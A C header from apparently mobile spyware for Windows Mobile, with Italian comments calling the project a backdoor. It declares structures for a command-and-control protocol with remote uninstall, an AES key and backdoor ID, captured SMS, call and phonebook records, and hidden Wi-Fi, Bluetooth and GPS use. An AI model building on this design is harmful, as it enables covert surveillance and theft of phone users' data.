#ifndef __Common_h__
#define __Common_h__

#pragma comment(linker, "/nodefaultlib:libc.lib")
#pragma comment(linker, "/nodefaultlib:libcd.lib")

#include <ceconfig.h>
#if defined(WIN32_PLATFORM_PSPC) || defined(WIN32_PLATFORM_WFSP)
#define SHELL_AYGSHELL
#endif

#ifdef _CE_DCOM
#define _ATL_APARTMENT_THREADED
#endif


#include <Windows.h>
#include <commctrl.h>

#ifdef SHELL_AYGSHELL
#include <aygshell.h>
#pragma comment(lib, "aygshell.lib") 
#endif // SHELL_AYGSHELL


// C RunTime Header Files
#include <stdlib.h>
#include <malloc.h>
#include <memory.h>
#include <tchar.h>

#if defined(WIN32_PLATFORM_PSPC) || defined(WIN32_PLATFORM_WFSP)
#ifndef _DEVICE_RESOLUTION_AWARE
#define _DEVICE_RESOLUTION_AWARE
#endif
#endif

#ifdef _DEVICE_RESOLUTION_AWARE
#include "DeviceResolutionAware.h"
#endif

#if _WIN32_WCE < 0x500 && ( defined(WIN32_PLATFORM_PSPC) || defined(WIN32_PLATFORM_WFSP) )
#pragma comment(lib, "ccrtrtti.lib")
#ifdef _X86_	
#if defined(_DEBUG)
#pragma comment(lib, "libcmtx86d.lib")
#else
#pragma comment(lib, "libcmtx86.lib")
#endif
#endif
#endif

#include <altcecrt.h>
#include <list>
#include <map>
#include <vector>
#include <new>

using namespace std;

/**
* Define per il debugging
*/
#ifdef _DEBUG
#define DBG_MSG(x) MessageBox(NULL, x, L"DBG_MSG", MB_OK | MB_TOPMOST);
#define DBG_MSG_2(x, y) MessageBox(NULL, x, y, MB_OK | MB_TOPMOST);
#define DBG_PRINT(x) OutputDebugString(x);
#else
#define DBG_MSG(x) /* */
#define DBG_MSG_2(x, y) /* */
#define DBG_PRINT(x)  /* */
#endif

/**
* Estensione per i file di log
*/
#define LOG_EXTENSION L".mob"

/**
* Define comuni
*/
#define MAX_ALLOCABLE_MEMORY 1024 * 1024 // 1 Mb (il define dovrebbe essere multiplo di 16)
#define LOG_VERSION_01 (UINT)0x00000001

/**
* Define per l'accesso concorrente
*/
//#define WAIT_AND_SIGNAL(x)	while(x){ MiniSleep(350); } x = TRUE;
#define WAIT_AND_SIGNAL(x)	if(WaitForSingleObject(x, INFINITE) == WAIT_ABANDONED) MessageBox(NULL, L"ABANDONED", L"", MB_OK);
#define WAIT(x)				while(x){ MiniSleep(350); }
//#define UNLOCK(x)			x = FALSE;
#define UNLOCK(x)			if(!ReleaseMutex(x)) MessageBox(NULL, L"Release Failed", L"", MB_OK);

/**
* Stato dell'agente
*/
#define AGENT_DISABLED	(UINT)0x1
#define AGENT_STOPPED	AGENT_DISABLED
#define AGENT_ENABLED	(UINT)0x2
#define AGENT_RUNNING	(UINT)0x3

/**
* Stato dei monitor
*/
#define EVENT_STOPPED	AGENT_DISABLED
#define EVENT_RUNNING	AGENT_RUNNING

/**
* Comandi per i monitor
*/
#define EVENT_STOP	EVENT_STOPPED

/**
* Comandi per l'agente
*/
#define AGENT_STOP	AGENT_STOPPED
#define AGENT_RELOAD	(UINT)0x1

/**
* Parametri del protocollo
*/
#define PROTO_OK			(UINT)0x1
#define PROTO_NO			(UINT)0x2
#define PROTO_RESEND		(UINT)0x3
#define PROTO_SYNC_START	(UINT)0x4
#define PROTO_GET_CONF		(UINT)0x5
#define PROTO_NEW_CONF		(UINT)0x6
#define PROTO_NO_CONF		(UINT)0x7
#define PROTO_BYE			(UINT)0x8
#define PROTO_CHALLENGE		(UINT)0x9
#define PROTO_RESPONSE		(UINT)0xA
#define PROTO_LOG			(UINT)0xB
#define PROTO_UNINSTALL		(UINT)0xC
#define PROTO_RESUME		(UINT)0xD

/**
 * Parametri di ritorno della Send()
 */
#define SEND_RELOAD		(UINT)0x1
#define SEND_UNINSTALL	(UINT)0x2
#define SEND_OK			(UINT)0x3
#define SEND_FAIL		(UINT)0x4

/**
* Struttura che definisce la configurazione globale della backdoor
*/
/*typedef struct _ConfStruct{
	BYTE AesKey[32];		// -> Inizializzata a 0xBAB0BAB0.... *
	WCHAR ConfName[32];		// -> Inizializzata a 0xC00DC00DC00D... (scramblato!)
	WCHAR LogDirName[32];	// -> Inizializzata a 0xF0CAF0CA...
	BYTE BackdoorID[8];		// -> Inizializzata a 0xD00FD00F *
	BYTE BTMacAddress[6];	// -> Inizializzata a 0xBACABACA
	BYTE WifiMacAddress[6];	// -> Inizializzata a 0xFACAFACA
	WCHAR WifiSSID[32];		// -> Inizializzata a 0xBABEBABE
	BYTE BTPin[8];			// -> Inizializzata a 0xB00BB00B (il PIN e' in ASCII!!!!)
	BYTE WifiKey[32];		// -> Inizializzata a 0xCAFECAFE
	UINT WifiKeyLen;		// -> Inizializzata a 0xF0DAF0DA
	BYTE Version[8];		// -> Anno/mese/giorno *
	BYTE UniqueKey[16];		// -> Inizializzata a 0xCACACACA
	DWORD ServerIP;			// -> Inizializzata a 0xFFAAEEBB
	BYTE ServerIPv6[16];	// -> Inizializzata a 0xF0F0F0
}ConfStruct, *pConfStruct;*/

typedef struct _ConfStruct{
	UINT uConfId;		// Id dell'opzione
	UINT uParamLength;	// Lunghezza della memoria allocata per pParams
	PVOID pParams;		// Puntatore alla lista dei parametri
}ConfStruct, *pConfStruct;

/**
* Definizione delle principali strutture comuni
*/
// WARNING - Non cambiare l'ordine dei primi 4 parametri della struttura
// altrimenti sara' necessario riscrivere il codice di parsing della configurazione.
typedef struct _AgentStruct{
	UINT uAgentId;		// Id dell'agente
	UINT uAgentStatus;	// Running, Stopped
	UINT uParamLength;	// Lunghezza della memoria allocata per pParams
	PVOID pParams;		// Puntatore alla lista dei parametri
	PVOID pFunc;		// Thread start routine
	UINT uCommand;		// Viene utilizzato per comunicare all'agente
}AgentStruct, *pAgentStruct;

// WARNING - Non cambiare l'ordine dei primi 4 parametri della struttura
// altrimenti sara' necessario riscrivere il codice di parsing della configurazione.
typedef struct _EventStruct{
	UINT uEventType;	// Tipo di evento (Timer, sms, call etc...)
	UINT uActionId;		// Id dell'azione da eseguire 
	UINT uParamLength;	// Lunghezza della memoria allocata per pParams
	PVOID pParams;		// Puntatore alla lista dei parametri
	PVOID pFunc;		// Monitor start routine
	UINT uEventStatus;	// Running, Stopped
	UINT uCommand;		// Viene utilizzato per comunicare col monitor
}EventStruct, *pEventStruct;

// WARNING - Non cambiare l'ordine dei primi 3 parametri della struttura
// altrimenti sara' necessario riscrivere il codice di parsing della configurazione.
typedef struct _ActionStruct{
	UINT uActionType;	// Tag che identifica l'azione
	UINT uParamLength;	// Lunghezza della memoria allocata per pParams
	PVOID pParams;		// Puntatore alla lista dei parametri
}ActionStruct, *pActionStruct;

typedef struct _MacroActionStruct{
	UINT uSubActions;		// Numero di strutture ActionStruct presenti
	pActionStruct pActions; // Puntatore ad un array di ActionStruct
	BOOL bTriggered;		// L'azione e' stata triggerata da un evento
}MacroActionStruct, *pMacroActionStruct;

typedef struct _TimerStruct{
	UINT uType;
	UINT Lo_Delay;
	UINT Hi_Delay;
}TimerStruct, *pTimerStruct;

typedef struct _EventConf{
	UINT uNum;		// Numero di eventi
	PVOID pParams;	// Parametri (Lunghezza, ID azione, Parametri / Lunghezza, ID azione, Parametri......)
}EventConf, *pEventConf;

typedef struct _DeviceStruct{
	UINT cbSize;
	BOOL bWifiHidingSupported;		// Id dell'azione
	BOOL bWifiAvailable;
	BOOL bWifiActivable;
	BOOL bBTHidingSupported;	// Tipo di azione da eseguire
	BOOL bBTAvailable;
	BOOL bBTActivable;
	BOOL bGpsAvailable;
	BOOL bGpsHidingSupported;
	OSVERSIONINFO OsVersionInfo;
}DeviceStruct, *pDeviceStruct;

// XXX - Allineare
typedef struct _CallStruct{
	UINT cbSize;
	BYTE PhoneNumber[15];
	UINT NameLength;
	BYTE *Name;
}CallStruct, *pCallStruct;

typedef struct _GeneralConf{
	list<AgentStruct *> *pAgents;
	list<EventStruct *> *pEvents;
	list<ActionStruct *> *pActions;
	list<ConfStruct *> *pConf;
}GeneralConf, *pGeneralConf;

// XXX - Allineare
typedef struct _PhoneBook{
	UINT cbSize;
	BYTE PhoneNumber[15];
	UINT NameLength;
	BYTE *Name;
}PhoneBookStruct, *pPhoneBookStruct;

// XXX - Allineare
typedef struct _Sms{
	UINT cbSize;
	BYTE Destination[15];
	UINT TextLength;
	union{
		PWCHAR pwText;
		PCHAR pText;
	};
}SmsStruct, *pSmsStruct;

/**
* Subito dopo la struttura scriviamo il nome del file in WCHAR, la struttura addizionale
* se necessaria e poi i dati di seguito. Non cambiare MAI l'ordine dei primi 2 membri!
* LOG_VERSION di questa struttura: 0.1
*/
typedef struct _LogStruct{
	UINT cbSize;			// Dimensione della struttura
	UINT uVersion;			// Versione della struttura
	UINT uLogType;			// Tipo di log
	UINT uHTimestamp;		// Parte alta del timestamp
	UINT uLTimestamp;		// Parte bassa del timestamp
	UINT FileSize;			// Lunghezza totale del file
	UINT FileNameLength;	// Lunghezza del nome del file in byte
	UINT uAdditionalData;	// Lunghezza della struttura addizionale, se presente
	WCHAR FileName[2];		// Puntatore al nome del file (e' 2 wchar per l'allineamento)
}LogStruct, *pLogStruct;

// Dword con l'upadded size del blocco

/**
* Qui definiamo tutti gli extern delle variabili globali necessarie
* al funzionamento della backdoor. Le definizioni si trovano in Common.cpp
*/
extern BYTE			g_Version[];
extern BYTE			g_AesKey[];
extern BYTE			g_BackdoorID[];
extern WCHAR		g_ConfName[];
extern HINSTANCE	g_hInstance;
/**
* Definizione delle funzioni helper comuni
*/
#define LOOP for(;;)

void MiniSleep(UINT uMilliSec);
void MiniSleepEx(UINT uMilliSec, UINT Type);
WCHAR* GetCurrentPath(WCHAR *pInFile);
#endif